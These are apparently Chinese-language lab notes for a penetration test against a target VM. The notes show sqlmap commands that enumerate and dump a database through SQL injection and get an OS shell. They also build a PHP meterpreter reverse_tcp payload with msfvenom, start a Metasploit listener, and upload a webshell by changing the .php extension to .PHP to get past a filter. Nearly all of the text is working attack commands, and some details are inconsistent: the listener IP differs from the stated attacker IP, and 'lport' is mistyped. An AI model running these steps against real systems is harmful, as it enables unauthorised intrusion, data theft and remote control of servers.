攻击机192.168.43.61
靶机192.168.43.65
admin弱命令
web漏洞扫描器owasp-zap
cross site scripting 高危漏洞
sql注入漏洞,可直接获取服务器权限
使用sqlmap利用sql 注入漏洞
sqlmap -u url --dbs
information_schema自带数据库,不用管
sqlmap -u url -D --tables
sqlmap -u url -D -T --columns
sqlmap -u url -D -T -C --dump
sqlmap -u url -os-shell直接获取shell
上传shell 反弹权限
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 Iport=4444 -f raw
攻击机启动监听
gedit shellcd.php
msfconsole
msf >use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost 192.168.1.108
run
查看端口netstat -pantu
上传shell执行shell
绕过过滤机制,利用.php修改为.PHP
点击shellcd监听端返回